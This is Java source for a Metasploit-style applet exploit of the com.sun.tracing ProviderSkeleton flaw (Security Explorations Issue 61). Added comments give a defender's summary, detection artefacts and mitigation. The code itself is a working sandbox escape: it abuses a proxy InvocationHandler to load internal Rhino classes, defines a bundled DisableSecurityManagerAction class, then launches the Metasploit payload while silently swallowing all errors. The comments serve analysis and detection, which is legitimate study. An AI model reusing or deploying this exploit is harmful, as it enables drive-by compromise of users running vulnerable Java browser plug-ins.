
import java.applet.Applet;
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles;
import java.lang.invoke.MethodType;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Method;
import java.lang.reflect.Proxy;

import metasploit.Payload;

import com.sun.tracing.Provider;
import com.sun.tracing.ProviderFactory;

/**
* Class exploiting the vulnerability in the ProviderSkeleton class. Based on
* POC of Security Explorations' Issue 61.
*
* @author mk
*
*/

public class Exploit extends Applet {

  // Defender's summary of this listing: the applet obtains the
  // InvocationHandler behind a com.sun.tracing Provider proxy and uses it as a
  // confused deputy -- reflective calls routed through that handler are made
  // from the handler's (trusted) frame rather than from applet code. With that
  // primitive it (1) gets a MethodHandles.Lookup, (2) loads internal Rhino
  // classes under sun.org.mozilla.javascript.internal, (3) defines a helper
  // class from bytes carried in the applet JAR, and (4) runs the Metasploit
  // payload. Observable artefacts for detection: a JAR resource named
  // DisableSecurityManagerAction.class, ProviderFactory.createProvider on a
  // class supplied by the applet, and a defineClass through Rhino's
  // DefiningClassLoader. Mitigation is the vendor fix for Issue 61 plus
  // removal of the browser Java plug-in; the Applet API this class extends
  // has been deprecated for removal in current JDKs.

  // Invocation handler extracted from the Provider proxy (see constructor).
  // Everything passed to invoc.invoke() is executed on the applet's behalf by
  // the handler, which is the vulnerability this class relies on.
  InvocationHandler invoc = null;
  // Lookup obtained through invoc; used by getMethod() to resolve
  // findStatic/findVirtual handles on otherwise inaccessible classes.
  MethodHandles.Lookup look;

  /**
   * Runs the whole chain from the applet constructor: read the helper class
   * bytes from the JAR, obtain a Lookup via the Provider proxy, load the
   * internal Rhino classes, define the helper class inside a Rhino class
   * loader, instantiate it, then hand off to {@link Payload#main}.
   * <p>
   * Every failure is swallowed by the catch-all below, so on a patched runtime
   * nothing is logged and the applet simply does nothing -- an analyst will see
   * no stack trace from this code path.
   */
  public Exploit() {
    try {

      // Slurp the helper class file bundled next to this class into memory.
      // The helper's body is not part of this listing; only its name is known.
      ByteArrayOutputStream classInputStream = new ByteArrayOutputStream();
      byte[] classBuffer = new byte[8192];
      int classLength;

      // NOTE(review): a missing resource yields null here and the NPE is
      // absorbed by the catch-all; the stream is also never closed.
      InputStream inputStream = getClass().getResourceAsStream(
          "DisableSecurityManagerAction.class");

      while ((classLength = inputStream.read(classBuffer)) > 0)
        classInputStream.write(classBuffer, 0, classLength);

      classBuffer = classInputStream.toByteArray();

      // Obtain a Provider proxy for ExpProvider (a related class, not shown)
      // and pull out its InvocationHandler. This handler is the privileged
      // deputy used for every subsequent reflective call.
      ProviderFactory fac = ProviderFactory.getDefaultFactory();
      Provider p = fac.createProvider(ExpProvider.class);
      invoc = Proxy.getInvocationHandler(p);
      Class handle = java.lang.invoke.MethodHandles.class;

      // MethodHandles.lookup() is caller-sensitive. Invoked via the handler,
      // the caller it observes is presumably the handler's own class rather
      // than this applet, so the returned Lookup carries that class's access
      // rights -- TODO confirm against the ProviderSkeleton source.
      Method m = handle.getMethod("lookup", new Class[0]);
      look = (MethodHandles.Lookup) invoc.invoke(null, m, new Object[0]);

      // Same trick for Class.forName: loading these sun.* internals directly
      // from applet code would normally be refused by package-access checks.
      Class context = loadClassUnderPrivContext("sun.org.mozilla.javascript.internal.Context");
      Class defClassLoader = loadClassUnderPrivContext("sun.org.mozilla.javascript.internal.DefiningClassLoader");
      Class genClassLoader = loadClassUnderPrivContext("sun.org.mozilla.javascript.internal.GeneratedClassLoader");

      // static Context Context.enter()
      MethodHandle enterMethod = getMethod(context, "enter", context,
          new Class[0], true);

      Class argTypes[] = new Class[1];
      argTypes[0] = ClassLoader.class;

      // GeneratedClassLoader Context.createClassLoader(ClassLoader)
      MethodHandle createClassLoader = getMethod(context,
          "createClassLoader", genClassLoader, argTypes, false);

      argTypes = new Class[2];
      argTypes[0] = Class.forName("java.lang.String");
      argTypes[1] = (new byte[0]).getClass();

      // Class DefiningClassLoader.defineClass(String, byte[])
      MethodHandle defineClass = getMethod(defClassLoader, "defineClass",
          java.lang.Class.class, argTypes, false);

      // Enter a Rhino context, create one of its class loaders with a null
      // parent, and define the bundled helper class inside it. The helper is
      // then instantiated; its name suggests what its constructor does, but
      // that code is not on this page.
      Object enterContext = enterMethod.invoke();
      Object cLoader = createClassLoader.invoke(enterContext, null);
      Class disabler = (Class) defineClass.invoke(cLoader,
          "DisableSecurityManagerAction", classBuffer);
      disabler.newInstance();
      // Hand off to the Metasploit payload stage.
      Payload.main(null);

    } catch (Throwable e) {
      // Deliberately silent: any exception (including a patched runtime
      // refusing one of the steps above) ends the attempt without a trace.
    }

  }

  /**
   * Loads a class by calling {@code Class.forName(String)} reflectively
   * through the Provider proxy's invocation handler instead of directly, so
   * the caller-sensitive access check is evaluated against the handler's
   * frame rather than against this applet.
   *
   * @param className fully qualified name of the class to load
   * @return the loaded class
   * @throws Throwable whatever the handler or {@code Class.forName} throws
   */
  private Class loadClassUnderPrivContext(String className) throws Throwable {
    Class ret = null;

    Class theClass = java.lang.Class.class;

    Class argTypes[] = new Class[1];
    argTypes[0] = String.class;

    Method m = theClass.getMethod("forName", argTypes);

    Object argObjects[] = new Object[1];
    argObjects[0] = className;

    // null receiver: forName is static, so only the handler's frame matters.
    ret = (Class) invoc.invoke(null, m, argObjects);

    return ret;
  }

  /**
   * Resolves a method handle on {@code c} using the Lookup obtained in the
   * constructor ({@link #look}); must not be called before that field is set.
   *
   * @param c              class declaring the method
   * @param methodName     method name
   * @param returnType     declared return type
   * @param argTypes       declared parameter types, in order
   * @param isStaticMethod {@code true} to use {@code findStatic}, otherwise
   *                       {@code findVirtual}
   * @return the resolved handle
   * @throws NoSuchMethodException  if no such method exists
   * @throws IllegalAccessException if the Lookup may not access it
   */
  private MethodHandle getMethod(Class c, String methodName,
      Class returnType, Class argTypes[], boolean isStaticMethod)
      throws NoSuchMethodException, IllegalAccessException {
    MethodHandle ret = null;

    MethodType methodType = MethodType.methodType(returnType, argTypes);

    if (isStaticMethod)
      ret = look.findStatic(c, methodName, methodType);
    else
      ret = look.findVirtual(c, methodName, methodType);

    return ret;
  }

}